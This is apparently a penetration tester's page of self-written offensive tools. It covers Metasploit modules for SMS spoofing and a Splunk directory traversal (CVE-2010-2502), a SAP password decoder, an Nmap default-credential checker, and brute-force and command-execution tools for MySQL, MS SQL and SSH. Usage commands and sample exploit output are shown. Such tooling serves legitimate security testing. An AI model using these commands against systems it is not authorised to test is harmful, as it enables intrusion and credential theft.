Coming soon, see recent blog post for more details.
Metasploit SMS Spoof Module
Here is a Metasploit auxiliary module for spoofing SMS. It uses the UK provider Click SMS (you will need an account and must agree to their terms of service).
SAP Easy Access Password Decoder
Users can create an authenticated shortcut to their SAP session using the Easy Access GUI. This shortcut is generally a .sap file that contains the path to the Easy Access binary, their username and an encoded form of their password. sap_decoder.rb is a Ruby script that will decode the password and display the clear-text value.
The supported character set is A-Z,a-z,0-9,\/|<>,.;'#~@:[]{}+=()*&^%$£"!` up to a max length of eight characters.
Example usage:
sap_decoder.rb PW_15F87F4D93F33508
[+] Decoded password: myles456
Splunk Metasploit Module - Directory Traversal
This is a Metasploit auxiliary module for the directory traversal vulnerability in the Splunk management interface (CVE-2010-2502). I did not find this vulnerability; I believe it was discovered by a chap called aaron. It does not require authentication and affects Splunk 4.0.0 - 4.0.10 and Splunk 4.1.0 - 4.1.1.
It is very simple to use: just point it at the RHOST. You can also configure which file to retrieve and what the installation path for Splunk is.
msf auxiliary(splunk_directory_traversal) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf auxiliary(splunk_directory_traversal) > exploit
[*] http://127.0.0.1/en-US/static/app/gettingstarted/:8000 - Checking if server is vulnerable
[+] Server is vulnerable
[+] [boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(2)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Splunk Nmap Script - Default Credential Check
Splunkbuster is an Nmap script that will locate a Splunk installation and attempt to authenticate with the default values (admin:changeme). It was written for Splunk 4.1.5, but assuming the auth does not change much it should be good for other versions. The existing Nmap script for HTTP brute forcing cannot be used because Splunk uses a "cval" cookie value, kind of like a CSRF protection, so I extract this value from an initial GET request and then submit it with the login POST.
Usage:
nmap --script splunkbuster -p 8000 -iL splunkTargets.txt
Output:
-- 8000/tcp open
-- | splunkbuster: Checking for splunk..
-- | [+] Splunk discovered..
-- |_ [+] Credentials discovered (admin:changeme)
MySQL Windows Command Exec
Java GUI application that will brute force MySQL and provide command execution by importing a user-defined function in c:\windows\system32\. I coded this before both sqlmap/sqlninja did similar things, and now Metasploit has great support for this - this should actually read - project deprecated.
MS SQL Shell
Java GUI application for automating brute force attacks against SQL Server. Once valid credentials are obtained, it can connect and re-enable xp_cmdshell, which it wraps to execute system shell commands. It also supports Windows integrated authentication, so it can be useful if you break out of a Citrix environment and need a connect-back to the local SQL instance without valid credentials.
SSH Joey Checker
Java GUI tool to check a list of hosts for default accounts via SSH. It automates a "joey" check, which is the same password as the username. Excellent for finding weak user accounts across a large list of SSH servers.